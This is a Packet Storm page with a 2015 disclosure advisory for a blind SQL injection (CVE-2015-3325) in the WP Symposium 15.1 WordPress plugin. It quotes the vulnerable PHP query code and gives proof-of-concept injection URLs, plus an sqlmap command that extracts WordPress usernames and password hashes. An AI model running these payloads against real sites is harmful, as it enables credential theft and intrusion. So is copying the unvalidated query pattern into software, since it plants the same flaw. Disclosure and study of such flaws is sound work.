exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress WP Symposium 15.1 SQL Injection

WordPress WP Symposium 15.1 SQL Injection
Posted May 7, 2015
Authored by Hannes Trunde

WordPress WP Symposium plugin version 15.1 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2015-3325
SHA-256 | 12d35576d9a9ec9f31a2b35395b82f006d16733e9bc13724d99127eae3ebc9ee

WordPress WP Symposium 15.1 SQL Injection

Change Mirror Download
=======================================================================

title: SQL Injection
product: WordPress WP Symposium Plugin
vulnerable version: 15.1 (and probably below)
fixed version: 15.4
CVE number: CVE-2015-3325
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/wp-symposium/
found: 2015-02-07
by: Hannes Trunde

mail: hannes.trunde@gmail.com
twitter: @hannestrunde

=======================================================================


Plugin description:
-------------------
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress
plugin that provides a forum, activity (similar to Facebook wall), member
directory, private mail, notification panel, chat windows, profile page, social
widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook
Connect and Mobile support! You simply choose which you want to activate!
Certain features are optional to members to protect their privacy."

Source: https://wordpress.org/plugins/wp-symposium/


Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.


Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind sql injection attack can be
performed within the forum feature to obtain sensitive information from the
database. The vulnerable code sections are described below.

forum.php lines 59-62:
===============================================================================
if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) {
$cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0;
$topic_id = isset($_GET['show']) ? $_GET['show'] : 0; // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE
}
===============================================================================

forum.php lines 95-103:
===============================================================================
if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) {
if ($topic_id == 0) {
$forum = __wps__getForum($cat_id);
if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3);
$html .= $forum;
} else {
$html .= __wps__getTopic($topic_id); // __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER
}
}
===============================================================================

functions.php lines 152-155:
===============================================================================
$post = $wpdb->get_row("
SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info
FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID
WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id); //UNVALIDATED $topic_id IS USED IN SQL QUERY
===============================================================================


Proof of concept:
-----------------
The following HTTP request to the forum page returns the topic with id 1:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1
===============================================================================

The following HTTP request to the forum page returns a blank page, thus
confirming the blind SQL injection vulnerability:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0
===============================================================================

Obtaining users and password hashes with sqlmap may look as follows:
================================================================================
sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users"
================================================================================


Contact timeline:
------------------------
2015-04-08: Contacting author via mail.
2015-04-13: Mail from author, confirming the vulnerability.
2015-04-14: Requesting CVE via post to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-15: Mail from author, stating that updated plugin version will be
available in the next few days.
2015-05-05: Mail from author, stating that fixed version has been uploaded and
should be available soon.
2015-05-07: Confirming that update is available, releasing security advisory


Solution:
---------
Update to the most recent plugin version.


Workaround:
-----------
See solution.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close